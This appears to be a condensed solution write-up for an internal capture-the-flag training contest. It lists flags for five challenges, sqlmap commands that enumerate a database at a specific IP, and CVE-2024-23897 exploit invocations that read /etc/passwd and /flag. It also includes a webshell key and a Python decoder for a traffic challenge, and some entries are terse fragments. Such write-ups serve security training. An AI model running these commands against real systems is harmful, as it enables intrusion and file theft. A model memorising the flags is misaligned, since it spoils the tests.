Internal Training Test - Chaitin Tech Platform
1. Log Analysis 2024 (100 points), Easy, Security Misc
0,1),1,1))=102: the numbers that follow these.
flag{mayiyahei1965ae7569}
2. Incident Coordination and Response - Exam (200 points), Medium, Security Misc
AntSword webshell key: d76R3478
flag{578530@chaitin}
3. Misc - Traffic Analysis (100 points), Easy, Security Misc
After filtering and sorting, the requests and their hex payloads are:
/agent/metrics/putLines
Zlib-decode the hex payloads to get the flag.
flag{d341f427e7974b33a8fdb8d386da878f}
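The decoding step above, as an added example that is not part of the original write-up: each /upload/N line is assumed to carry a hex-encoded zlib stream whose plaintext is one decimal character code, and the lines have to be ordered by numeric index, not lexicographically. The function names and the sample lines are constructed for illustration.

```python
import re
import zlib

# "/upload/<index> <hex>" as in the filtered request list (format assumed)
LINE_RE = re.compile(r"^/upload/(\d+)\s+([0-9a-fA-F]+)$")


def decode_uploads(lines):
    """Rebuild the string spelled by zlib-compressed decimal character codes."""
    chunks = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unrelated request such as /agent/metrics/putLines
        index, blob = int(m.group(1)), bytes.fromhex(m.group(2))
        try:
            text = zlib.decompress(blob).decode("ascii")
        except (zlib.error, UnicodeDecodeError) as exc:
            raise ValueError(f"/upload/{index}: not a zlib stream of ASCII") from exc
        chunks[index] = chr(int(text))  # e.g. "102" -> "f"
    if not chunks:
        return ""
    # A gap means a request was lost in filtering; fail instead of guessing.
    missing = [i for i in range(max(chunks) + 1) if i not in chunks]
    if missing:
        raise ValueError(f"missing upload indices: {missing}")
    return "".join(chunks[i] for i in sorted(chunks))


def make_sample(secret):
    """Build constructed capture lines for a string (not data from the page)."""
    lines = ["/agent/metrics/putLines"]
    for i, ch in enumerate(secret):
        payload = zlib.compress(str(ord(ch)).encode()).hex()
        lines.append(f"/upload/{i} {payload}")
    # Lexicographic order puts /upload/10 before /upload/2, as a naive sort would.
    return sorted(lines)


# Constructed sample input; the value is a placeholder, not a real flag.
SAMPLE = make_sample("sample{constructed-value}")

if __name__ == "__main__":
    print(decode_uploads(SAMPLE))
```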
4. Web - SQL Injection (200 points), Medium, Web Security
sqlmap -u http://101.200.43.249/sql2.php/?id= --current-user
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 --tables
sqlmap -u http://101.200.43.249/sql2.php/?id= -D pwnhubsql2 -T flaghahaha --columns
flag{43913e17463a90ecbebd2bdfa0ab362b}
5. CVE-2024-23897 (200 points), Medium, Web Security
CVE-2024-23897 -url http://59.110.164.194:8080/ -c reload-job -a /etc/passwd
flag{afc832a6-b6be-7732-fb89-deefec2a7def}
usage: CVE-2024-23897.py -u http://59.110.164.194:8080 -f /flag